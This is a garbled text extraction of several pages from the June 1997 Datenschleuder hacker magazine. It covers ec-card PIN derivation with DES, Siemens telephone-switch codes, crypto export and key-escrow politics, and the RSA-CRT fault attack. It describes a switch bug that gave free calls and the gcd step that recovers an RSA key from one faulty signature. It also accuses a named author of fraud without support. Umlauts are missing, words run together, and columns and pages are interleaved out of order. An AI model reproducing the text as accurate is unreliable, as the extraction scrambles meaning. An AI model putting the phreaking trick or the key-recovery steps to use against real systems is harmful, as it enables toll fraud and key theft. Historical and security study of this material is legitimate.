Gesamtdeutschland.Anmerkungen der Redaktion:
- Eingabe des PIN-Codes auf Touchscreen bei GAA:
z.B. Citibank (Quelle: Pausch bei Vortrag in Hamburg
auf dem ala Card-Forum)
- Ofine-Zeiten der GAA sind z.B. auch durch
Umbuchung der technischen auf die juristischen
Datenbestnde bedingt, wie etwa bei der Deutschen
Bank zwischen 22 und 7 Uhr (Batchbetrieb, auch kein
Zugriff auf Kontostandsdrucker) (Quelle: Kunden-
Beobachtung ++)
- Hardware-Sicherheits-Modul : gemeint ist z.B. derDALLAS DS5002FP, ein Hochsicherheits-
Microkontroller mit BUS-Verschlsselung, der von
Markus Kuhn vollstndig geknackt wurde. Befehlssatz
ist 8031 kompatibel. (Quelle: Nachricht in de.org.ccc
von Michael Holztl, [email protected])
- die Hinweise auf auf die Entwendung eines solchen
Moduls und dem kriminellen Einsatz in der BRD
(Pausch in Hamburg: Region Berlin) entstammen
Christian Zimmermanns Buch Der Hacker, das
bezglich seiner Informationsgte als oberchlichund undifferenziert und teilweise sachlich falsch zu
bezeichnen ist. Der Autor Christian Zimmermann ist
u.a. als einer der Drahtzieher der Telekom-Affre um
berhhte Telefonrechnungen unschuldiger Kunden
der Redaktion bekannt, verursacht durch
Manipulationen (Dialer etc.) an Telekomleitungen zum
Zwecke des Supporting von Auslands (Sex) und
0190-Nummern. Insofern sind seine Aussagen als
Hacker unglaubwrdig, seine kriminellen
Intentionen und Kontakte jedoch als glaubwrdig ein-
zustufen.
b) Ist es dabei denkbar, da ein Tter diese
innerhalb von 30 Minuten herausndet, gege-benenfalls mit Hilfe von Erkenntnissen auseinschlgigen Vortaten, um welcheVorkenntnisse mte es sich dabei handeln?
Antwort:
Zum Zeitbedarf wurde bereits die Antwortgegeben: Es ist denkbar, da ein Tter diePIN einer gestohlenen ec-Karte innerhalb von30 Minuten herausndet.
Wenn man Vorkenntnisse aus einschlgigenVortaten unterstellt, so mten diese nach
Lage der Tatumstnde mittelsSystemkomponenten durchgefhrt wordensein, wenn nicht ein dem Sachverstndigenderzeit unbekanntes Berechnungsverfahrenzur PIN-Ermittlung eingesetzt worden ist.
Mit geringerer Wahrscheinlichkeit istanzunehmen, da der Tter lediglich mittieferem Wissen um die Ablufe imZahlungsverkehr zum Erfolg gekommen ist.Allerdings deutet der Umstand der dreistenBarabhebungen auf fundiertes (Insider)Wissen im automatisierten Zahlungsverkehr
hin. (1) Markus Kuhn: PIN auf EC-Karten knacken? /06.08.1996 (2) Ulf Moeller: Sicherheit von ec-Karten / 28.06.1996http://www.c2.net/~um/faq/pin.html(3) Die Datenschleuder - Das wissenschaftlicheFachblatt fr kreative Techniknutzung. Ein Organ desChaos Computer Club, Nr. 53 von Dezember 1995,ISSN 0939-1045(16) DIN/ISO 4909 und Regelwerk des ZentralenKreditausschusses
(19) AG Kln 116 Js 599/89(21) Zentraler Kreditausschu: Anhang 3 zu denRichtlinien fr das deutsche ec-Geldautomatensystemi.d. F.v. 01.01.1995, S. 28
(22) Siegfried Herda: Gutachten zur Sicherheit von ec-Karten mit Magnetstreifenfr LG Kln Az.: 1 1 S 338/92, Februar 1994(23) Michael J. Wiener: Efcient DES Key Search, Bell-Northern Research Ottawa 20. August 1993(24) Balze, Dife, Rivest, Schneider, Shimomura,Thompson, Wiener: Minimal Key Lengths forSymmetric Ciphers to provide Adequate
Die Datenschleuder
Nummer 59, Juni 1997
Gutachten 9422/ 03
-
8/9/2019 Datenschleuder #59
22/32
Ermittlung der PIN
Die Datenschleuder
Nummer 59, Juni 1997
EC-Karten Unsicherheit
Bankleitzahl
12345678
Konto-Nummer
1234567890
Kartenfolgenummer
1
4567812345678901 zu verschlsselnde Dezimalzahl
Wandlung in Binrzahl
DES 56 Bit geheimer Schlssel
Ergebnis des DES-Verfahrens:
Inst.-Schl. 1D375AF548B34C48
Pool-Schl. 2FD5B2FF3A4827FF
Vom Ergebnis werden 3.-6.
Stelle fr PIN ausgewhlt.
Instituts-
karte?
ja
375A
nein
D5B2Ergebnis mit
Institutsschlssel
Ergebnis mitPoolschlssel
0248Offset wird bei
Poolschl. addiert
PIN 3750
Wandlung von Hex zu Dezimal nach Modulo 10
-
8/9/2019 Datenschleuder #59
23/32
Neue EWSD-Features
Auch die Siemens-Vermittlungsstellen(EWSD) erhielten krzlich neue Software.Unter anderem wurde eine Art Anti-Scan-Verhalten in Bezug auf */#/A/B/C/D-Kombinationen eingebaut. So reagiert die Vst
jetzt wesentlich toleranter auf versehentlicheFalscheingaben bei Steuersequenzen (*xxx,#xxx, *#xxx). Neu hinzugekommengegenber dem vorigen Release sind *34#und *35# (bzw. #34#/*#34#/#35#/*#35#),die wahrscheinlich eine Auswahl der Art derAnrufsperre durch den Teilnehmerermglichen sollen. Bisher konnte man mit*33# nur einen vorher festgelegten Typ (z.B.Auslands- oder Vollsperre) aktivieren. Schonseit der letzen Version gibt es *37# (Rckruf
bei besetzt auch fr analoge Anschlsse) und*31# und *22# (Funktion unbekannt, wei
jemand genaueres?).
Ein eher nervendes Feature wurde mitdiesem Update der Anrufweiterleitung zuteil:Der Anrufer hrt, wenn er einen Anschluanruft, der umgeleitet wird, die Ansage Wirverbinden weiter. Somit entfllt dieMglichkeit, Anrufe diskret umzuleiten.
Bugs
Mit der neuen EWSD-Software verschwandauch ein sehr beliebter ISDN-Bug: Fr alleAnschlsse an Siemens-Vsts gibt es eineNummer, mit der man begrenztLeitungsqualitt und Funktion desAnschlusses prfen kann (z.B. Berlin:01177555+). Wenn man
jedoch 01177555+ whlte,und zwar so, da ein Teil dieser Nummer inBlockwahl (mehrere Ziffern werden gleichzei-tig zur Vst geschickt, z.B. durch Wahl bevorman den Hrer abnimmt) und der andere Teileinzeln bermittelt wurde, hatte man eineVerbindung zu diesem Anschlu -gebhrenfrei (wie grundstzlich alleVerbindungen zu Nummern, die mit 0117
beginnen)[email protected]
Pannen bei Software-Updates
Bei der Einspielung der neuenVermittlungsstellen-Software Anfang Aprilstrzten die SEL-Ortsvermittlungsstellen am8.4.97 in Nrnberg und Mnchen erstmalganz ab. In anderen Ortsnetzen wurdenNetzansagen (z.B. Kein Anschlu unterdieser Nummer) nicht mehr korrekt wieder-gegeben, Makeln funktionierte nicht mehrund einigen Teilnehmern wurde eine nichtabschaltbare Umleitung auf die T-Net-Boxaktiviert.
T-Net-Box
Die T-Net-Box ist der Anrufbeantworter imNetz der Telekom. Von den meistenAnschlssen an digitalen Vermittlungsstellen(S12/EWSD) kann dieser inzwischen ber die0130/144770 eingerichtet werden. Allerdingssollte man vorher sicherstellen, da man - imFalle eines ISDN-Anschlusses - ber
Anrufweiterschaltung verfgt, bzw. bei nicht-ISDN die zugehrigen Steuersequenzenfreigeschaltet sind (*xxx#: Umleitung auf T-Net-Box aktivieren, wobei fr xxx gilt: 000 -alle Anrufe auf den Anrufbeantworterumleiten, 555 - bei besetzt, 888 - nach 15Sekunden klingeln. Mit #xxx# wird die jewei-lige Umleitung deaktiviert). brigens ist dasT-Net-Box-System noch mindestens bis zum31.7. im Test-Betrieb. Dieser sollte zwar zum1.6. beendet sein, mute jedoch wegenSoftware-Problemen verlngert werden.Bevor man diesen Netz-AB einemherkmmlichen vorzieht, sollte man jedoch
beachten, da die *T*** damit theoretischZugriff auf alle eingegangenen Nachrichtenhat.
Weitere Informationen zur T-Net-Box gibt esals Faxabruf-Dokument unter 0228/1819657oder bei den freundlichen HotlineMitarbeitern unter 0130/141414.
Die Datenschleuder
Nummer 59, Juni 1997
OVst-Watch
-
8/9/2019 Datenschleuder #59
24/32
mglichst noch vor der Sommerpause eine
Direktive an die Mitgliedslnder zurEindmmung illegalerEntschlsselungstechnik auszugeben.
Darber hinaus sollen sich auchPrivatpersonen strafbar machen, die illegaleEntschlsselungstechnik benutzen oder besit-zen. Durch ein derartiges Gesetz entstndeeine gefhrliche technische Grauzone in derStrafbarkeit, weil damit letztlich alleleistungsfhigen frei programmierbarenComputer illegal werden.
Der Kosten/Nutzen-Aufwand zum Knackenvon Eurocrypt betraegt fr einen Geheim-dienst mit Budget 300 Millionen US-Dollar ca.zwlf Sekunden, bei einemGrossunternehmen mit 10 Mio$ Budget etwasechs Minuten (es heisst, der BND habe zweisolcher Maschinen) und bei einer Investitionvon nur 400 Dollar 38 Jahre.
Wau Holland fuer eMailPress, die agentur gegenden [email protected]
Deutscher BundestagDrucksache 13 / 775313. Wahlperiode 22.05.97
Antwort der Bundesregierung auf die KleineAnfrage des Abgeordneten Dr. ManuelKiper und der Fraktion BNDNIS 90/DIEGRNEN - Drs. 13/ 7594
Lage der IT-Sicherheit in Deutschland
47.Welcher Aufwand ist nach Kenntnis derBundesregierung ntig, um mit asymmetrischenVerfahren verschlsselte Daten mitSchlssellngen von 40, 56 und 128 Bit zuentschlsseln und wie gross ist nachAuffassung der Bundesregierung die fr eineVerschlsselung sensitiver Daten hinreichendeSchlssellnge fr eine - auch ber die nchsten
fnf Jahre - sichere bermittlung?
Unter der Voraussetzung, dass fr einsymmetrisches Verfahren keine andereAnalysemethode bekannt ist als dievollstndige Absuche des Schlsselraumes,lassen sich die nachstehenden Aussagentreffen:
Die Datenschleuder
Nummer 59, Juni 1997
Krypto-New s
Alte Welt bangt und zappelt
Gesetze gegen Codeknacker geplant(emp) 06.06.97 - Eine europaweiteGesetzgebung gegen sogenannteFernsehpiraterie rckt nher. Weil nichtzuletzt durch den Einuss der kryptofeind-lichen Franzosen bei der Eurocrypt-Norm einschwaches Verschlsselungsverfahren (DESmit nur 56 Bit) gewhlt wurde, sindCodeknacker bei der Entschlsselung vonPay-TV-Fernsehprogrammen oft erfolgreich.
Statt starke Verschlsselungsverfahrenzuzulassen, soll jetzt sogar der Besitz vonComputern kriminalisiert werden, wenn siegeeignet zum Codeknacken sind. Der Berichtfordert Strafgesetze gegen Personen undUnternehmen, die ohne Autorisierung Gerteund Entschlsselungssoftware herstellen, ver-
breiten oder verkaufen. 422 Abgeordnete desEuropaparlamentes stimmten am 13. Mai1997 in Strassburg dem Anastassopoulos-Bericht zu, bei sechs Gegenstimmen undsechs Enthaltungen. Das Parlament
beauftragte die Europische Kommission,
-
8/9/2019 Datenschleuder #59
25/32
USA-Regulierungen
Kontrolleinschrnkungssimulation
The US government will announce latertoday that will soon lift controls ontechnology crucial to doing business over theInternet, White House advisor Ira Magazinersaid yesterday evening.
Under plans expected to be outlined at anoontime press brieng today, the federalgovernment will require that producers of
specialized, narrowly focused datascrambling products submit only to one-timegovernment approval before they sellpowerful encryption products abroad.Current policy requires case-by-case approvalin most instances.
Basically it will say that for basic nancialand electronic applications there will be noexport restrictions and no requirement forkey recovery, Magaziner said.
US Undersecretary of Commerce WilliamReinsch is expected to give details of the plan.
Reinsch could not be reached for comment.Computer industry executives and publicinterest groups said the new arrangement,though far short of deregulating allencryption, was a step in the right direction.
This is evidence that the administration ack-nowledges that manufacturers of foreign
* 40-Bit-Verfahren knnen - allerdings mit
hohem zeitlichen und apparativen Aufwandmittels Hochleistungsrechnern oder auf demWege des verteilten Rechnens entziffertwerden. Die genaue Hhe des Aufwandes istverfahrensabhngig.
* 56-Bit-Verfahren erfordern zu ihrerEntzifferung den Einsatz vonSpezialrechnern,die eigens zu diesem Zweck konstruiertwerden mssen. Bei deren entsprechenderDimensionierung lsst sich der zeitlicheAufwand auf die Groessenordnung vonStunden begrenzen.
* Die vollstndige Absuche eines 128-Bit-Schlsselraums entzieht sich jeder heute undin absehbarer Zeit verfgbarenRechentechnik.
Ab einer Schlssellnge von etwa 80 Bit kann- bei ansonsten entzifferungsresistentemDesign - die Mglichkeit einer Analysedurch Absuche des Schlsselraums frdie berschaubare Zukunft, insbesondere dernchsten fnf Jahre, ausgeschlossen werden.
Verteilte brute force attacke auf DES
DES noch nicht tot, stinkt aber schon
Am 19. 6.1997 war es soweit: erstmals in derGeschichte hat eine nicht-geheimeOrganisation einen DES-Schlssel durch
brute force geknackt. Von der Firma RSAwurden $10.000 Preisgeld und einPlaintext/Ciphertext-Paar bereitgestellt,insgesamt wurden von mehreren tausendTeilnehmern in zwei ueber das Internetkoordinierten Gruppen (eine fuer die USA,eine fuer den Rest) ungefaehr 50% desSchluesselraums durchsucht, und es wurdennach vorsichtigen Schaetzungen 447.000MIPS-Jahre verbraten. Damit geht dieserHack als groesste verteile Berechung in dieGeschichte [email protected]
Die Datenschleuder
Nummer 59, Juni 1997
-
8/9/2019 Datenschleuder #59
26/32
render it all but useless for general use. Visa,
MasterCard and American Express developedthe standard. Id expect programs writtenthe SET to get very rapid approval - withinweeks, Daguio said.
In addition, US companies will have leewayto export any kind of encryption to any bankas long as that encryption is used only forlegitimate, internal bank functions. Productsdesigned for merchant-to-merchanttransactions without a bank in betweenwould still be subject to stricter controls,including use of weak software routines that
make decoding by law enforcement easy, ordeposit of decoding keys with lawenforcement bodies prior to export.Commerce Department regulations will spellout details this month or next, Daguio said.
Though more sweeping in nature than pastgovernment regulations, the US bankingindustry has long enjoyed more freedom touse powerful encryption technologies abroadthan other industries. Successiveadministrations have granted banks thatleeway since by denition they must have
greater safeguards over employee behaviorthan all but a handful of industries. In additi-on, nancial applications have long beeneasier to design for export since they typicallyrequire encryption of only a few standarddata elds. If sufciently limited in design,the reasoning goes, they pose no threat to lawenforcement concerned about smugglers orterrorists who may want to evade detection
by law enforcement. The government and thecomputer industry have for years been lockedin disputes over the relative importance of
encryption technologies and their potentialfor misuse. [...]Absent US encryption exports, they claim,American companies will soon lose theirleadership role in a technology crucial to thecountrys competitiveness.
Federal ofcials, on the other hand, have saidexport of the technology threatens globalsecurity, since terrorists and criminals inoutlaw states like Libya and North Koreacould easily use the technology to defeatwiretaps and data searches increasingly
prized by law enforcement and national secu-
Die Datenschleuder
Nummer 59, Juni 1997
Krypto-New s
encryption products do exist, said PeterHarter, public policy counsel at NetscapeCommunications Corp. Their policy has putAmerican industry in the back seat and nowwere trying to catch up. David Banisar,policy analyst at the Washington-basedElectronic Privacy Information Center, calledthe move a small step forward.Nonetheless, it still doesnt reach the needsfor secure e-mail or other purposes, he said.
Computer software and hardware eligible fordecontrol under the proposed regulationsmust t several criteria, said Kawika Daguio,a public affairs specialist with the AmericanBankers Association who helped hammer outan agreement for the new regulations.
.Though products designed for use by thegeneral public may be unlimited in thestrength of the encryption techniques they
employ, they must also be strictly limited inuse, he said. Software written for homebanking, for instance, must be usable only forbank transactions and not easily modied forgeneral use. Most programs handed out by
banks for PC banking at home t that criteria,he said.
Programs that use the industry SET standardfor credit card purchases over the Internetshould easily meet Commerce Departmentcriteria, too, since the SET standard encryptsonly those data essential to making online
purchases; the limited uses of the standard
-
8/9/2019 Datenschleuder #59
27/32
In letzter Minute: Amis drehen doch noch durch
ALERT: Senate to vote on mandatorykey escrow as early as Thu June 19!
On Tuesday June 17, Senators John McCain (R-AZ) andBob Kerrey (D-NE) introduced legislation which wouldall but mandate that Americans provide guaranteedgovernment access to their private onlinecommunications and stored les. The bill, known asThe Secure Public Networks Act of 1997 (S.909)represents a full scale assault on your right to protectthe privacy and condentiality of your online commu-
nications. Though offered on Capitol Hill as a compro-mise, the McCain-Kerrey bill is virtually identical todraft legislation proposed earlier this year by theClinton Administration while doing nothing to protectthe privacy and security of Internet users. The billclosely mirrors draft legislation proposed by theClinton Administration earlier this Spring. Specically,the bill would:* Compel Americans to Use Government-ApprovedKey Recovery Systems * Make Key Recovery aCondition Of Participation in E-Commerce * AllowGovernment Carte Blanche Access to SensitiveEncryption Keys Without a Court Order * Create NewOpportunities for Cybercrimes * Codify a low 56-bitKey Length Limit on Encryption Exports * CreateBroad New Criminal Penalties for the Use ofEncryption. The full text of the bill, along with a detai-led analysis, is available online athttp://www.cdt.org/crypto/
rity agencies. In response, they demand that
exports of powerful encryption include so-called key recovery - a method by which lawenforcement can gain access to the encryptionkeys used to encode messages. Many publicinterest groups have condemned the plans,however, saying such a transfer of power tolaw enforcement threatens to usher in an eraof ubiquitous and illegal eavesdropping.Several bills pending in Congress would doaway with nearly all controls. Reinsch wasexpected to testify at congressional hearingson one of the bills this morning.
By Will Rodger /Washington Bureau CheifInter@ctive Week
These new regulations to be issued arescrambling to catch up with previous andcurrent practices...
It doesnt change things at all.When they issued the new export regulationsin January, the glaring hole was the absenceof an explicit exception for the nancial indu-stry. Under the customs that evolved aroundITAR, you could get an export license forstrong crypto as long as the overseascustomer was a nancial institution. Thisannouncement is simply a publicacknowledgment that the BXA will lookfavorably on export requests to banks andthat someday theyll try to draft specic regu-lations on the subject. Meanwhile you do it
by grinding through the bureacracy. Exportpermission for strong crypto that onlyencrypts nancial data is clearly a variant ofthis tradition. They already granted export
permission for one vendor of such a system,so Im not surprised theyre planning to makeup a regulation to cover it.Rick. [email protected]
PGP darf exportiert werdenPretty Good Privacy, hat vom US-Handels-ministerium die Erlaubnis bekommen, dadas Produkt nun auch mit der 128-Bit-Verschluesselungstechnologie ofziellexportiert werden darf.
30.05.97 Horizont Newsline
Die Datenschleuder
Nummer 59, Juni 1997
-
8/9/2019 Datenschleuder #59
28/32
Nach dem Chinesischen-Restsatz (Chinese
Remainder Theorem) existieren nmlich zweieinfach und nur einmal im vorausbestimmbare Werte a und b mit
a = 1 MOD p, a = 0 MOD q bzw b = 0 MODp, b= 1 MOD q.
Mit diesen beiden Zahlen gilt
E=aE[p]+bE[q] MOD N.
Diese ist offensichtlich deutlich efzienter als-die direkte Potenzierung modulo N, da dieOperationen mit deutlich krzeren Zahlendurchgefhrt werden knnen. Bruce Schneierempehlt in seinem StandardwerkAngewandte Kryptographie (1996) diesesVorgehen und auch die RSAREF-Referenzim-plementierung von RSASDI und PGPverwenden das CRT. Sind p und q ungefhrgleich gro, halbiert sich ungefhr die Lngeder Zwischenergebnisse. Dies ist natrlichfr Chipkarten mit beschrnktemSpeicherplatz von ganz besonderem Vorteil.Die Signaturzeit wird nach Angaben derChipkartenhersteller mindestens halbiert.
FAMEX -Zahlen aus einem Philipsprospekt(Mai 1997)Schlssel-Bits, 512, 768, 1024, 2048Straightforward (ms), 140, 410, 805, 18200Chinese Remainder (ms), 56, 164, 322, 2156
Gehen wir nun davon aus, da entweder beider Berechnung von E[p] oder von E[q] einFehler auftritt. Diese Annahme ist, da dieseBerechnungen die zeitlich aufwendigstenAbschnitte des Algorithmus sind, sehrrealistisch. Nun ist mit hoherWahrscheinlichkeit N kein Teiler von (M-
F^e), wobei e der zur Verikation derSignatur bentigte ffentliche Exponent ist.Dann gilt aber
GGT(M-F^e,N)=q.
Somit kann man den RSA-Modul N(=pq) fak-torisieren und so einfach den geheimenSchlssel d berechnen. Kurz gesagt ist dasder kryptographische Super-GAU.
Witzig dabei ist, da der einfache Anwender,der zur Kontrolle der Signatur M=E^eausrechnen mu, direkt auf den Fehler hinge-
wiesen wird.
Die Datenschleuder
Nummer 59, Juni 1997
Abt. w undersame Dinge
Fehler & Folgen
RSA(CRT): One strike and youre out!Manchmal sind es die berhmtenRandbemerkungen, die kryptographischeErdbeben auslsen sollten. Speziell wenn die-se Randbemerkung zwei Tage nach einerwichtigen Verffentlichung von Arjen Lenstrakommt. Lenstra ist nicht nur einer derHackervter von digicrime, sondern auchpromovierter Mathematiker und einer derfhrenden Faktorisierungsforscher. Wenn dieWissenschaftler von Bellcore in ihrem
berhmten Artikel On the Importance ofChecking Cryptographic Protocols on Faultsalso eine Mail von Lenstra zitieren, istsicherlich Aufmerksamkeit angesagt.
Aber irgendwie scheint es mal wiederniemanden zu interessieren, was sichHacker/Mathematiker da berlegt haben.Dabei ist die Sache hchst brisant: EINEdurch Hardwarefehler unkorrekte RSA-Unterschrift fhrt mit fast 100%-igerSicherheit zur Aufdeckung des geheimenRSA-Schlssels. Der Angreifer bekommtdie Mglichkeit direkt angezeigt, und dieBerechnung ist trivial.
Um es wissenschaftlich exakt zu formulieren:Entsteht ein Fehler whrend des Signierens,tritt er mit hoher Wahrscheinlichkeit zum imFehlermodell angenommenen Zeitpunkt auf.Er kann als beliebiger Bitfehler angenommenund mit sehr hoher Wahrscheinlichkeit kanndas RSA-Modul N mit einem Aufwand voneiner Potenzierung mit dem ffentlichenExponenten, einer Addition und einer GGT-Blidung faktorisiert werden.
Aber der Reihe nach:
Durch einen altbekannten mathematischenTrick kann man die fr das RSA-Verfahrennotwendige, aufwendige Potenzierung stark
beschleunigen. Statt die RSA-Signatur
E=m^d MOD N
direkt modulo N zu berechnen, rechnet mandie beiden Werte
E[p] =m^d MOD p und E[q]=m^d MOD q,wobei p und q die beiden Primfaktoren vonN sind.
-
8/9/2019 Datenschleuder #59
29/32
-
8/9/2019 Datenschleuder #59
30/32
Internet jetzt mit FlirtmaschineThe Internet is transforming courtship, with aservice as sly as it is shy. Mixing digital-ageefciency with old-fashioned mystery, afreeweb site called Secret Admirer TheElectronic Cupid,http://www.SecretAdmirer.com, lets usersanonymously nd out if their romanticfeelings are mutual. When you receive aSecret Admirer e-mail it reads: This messagehas been sent by a secret admirer! Is thefeeling mutual? The only way to nd outwho may have sent you a message is to go to
the web site and send an anonymous SecretAdmirer